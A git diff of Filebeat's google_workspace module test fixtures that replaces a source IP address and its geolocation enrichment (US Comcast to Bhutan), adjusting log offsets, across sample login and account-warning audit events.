- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
 "event.provider": "login",
 "event.start": "2020-07-02T13:08:25.123Z",
 "event.type": [
@@ -133,26 +125,22 @@
 "google_workspace.login.affected_email_address": "foo@elastic.co",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 853,
+ "log.offset": 851,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -176,7 +164,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
 "event.provider": "login",
 "event.start": "2020-07-02T13:08:25.123Z",
 "event.type": [
@@ -189,26 +177,22 @@
 "google_workspace.login.affected_email_address": "foo@elastic.co",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1316,
+ "log.offset": 1313,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -232,7 +216,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
 "event.provider": "login",
 "event.type": [
 "change",
@@ -245,26 +229,22 @@
 "google_workspace.login.affected_email_address": "foo@elastic.co",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1776,
+ "log.offset": 1772,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -288,7 +268,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
 "event.provider": "login",
 "event.type": [
 "change",
@@ -301,26 +281,22 @@
 "google_workspace.login.affected_email_address": "foo@elastic.co",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2176,
+ "log.offset": 2171,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -344,7 +320,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
 "event.provider": "login",
 "event.type": [
 "change",
@@ -357,26 +333,22 @@
 "google_workspace.login.affected_email_address": "foo@elastic.co",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2591,
+ "log.offset": 2585,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -400,7 +372,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}",
 "event.provider": "login",
 "event.start": "2020-07-02T13:08:25.123Z",
 "event.type": [
@@ -414,26 +386,22 @@
 "google_workspace.login.affected_email_address": "foo@elastic.co",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2992,
+ "log.offset": 2985,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -457,7 +425,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}",
 "event.provider": "login",
 "event.type": [
 "info"
@@ -468,26 +436,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3448,
+ "log.offset": 3440,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -509,7 +473,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
 "event.outcome": "failure",
 "event.provider": "login",
 "event.type": [
@@ -524,26 +488,22 @@
 "google_workspace.login.type": "exchange",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3768,
+ "log.offset": 3759,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -564,7 +524,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
 "event.outcome": "failure",
 "event.provider": "login",
 "event.type": [
@@ -578,26 +538,22 @@
 "google_workspace.login.type": "exchange",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 4262,
+ "log.offset": 4252,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -618,7 +574,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
 "event.outcome": "failure",
 "event.provider": "login",
 "event.type": [
@@ -633,26 +589,22 @@
 "google_workspace.login.type": "exchange",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 4743,
+ "log.offset": 4732,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -674,7 +626,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
 "event.provider": "login",
 "event.type": [
 "end"
@@ -686,26 +638,22 @@
 "google_workspace.login.type": "exchange",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 5273,
+ "log.offset": 5261,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -727,7 +675,7 @@
 "event.dataset": "google_workspace.login",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
 "event.outcome": "success",
 "event.provider": "login",
 "event.type": [
@@ -742,26 +690,22 @@
 "google_workspace.login.type": "exchange",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 5627,
+ "log.offset": 5614,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log
index ed672b58a568..ca7933706be6 100644
--- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log
@@ -1,2 +1,2 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
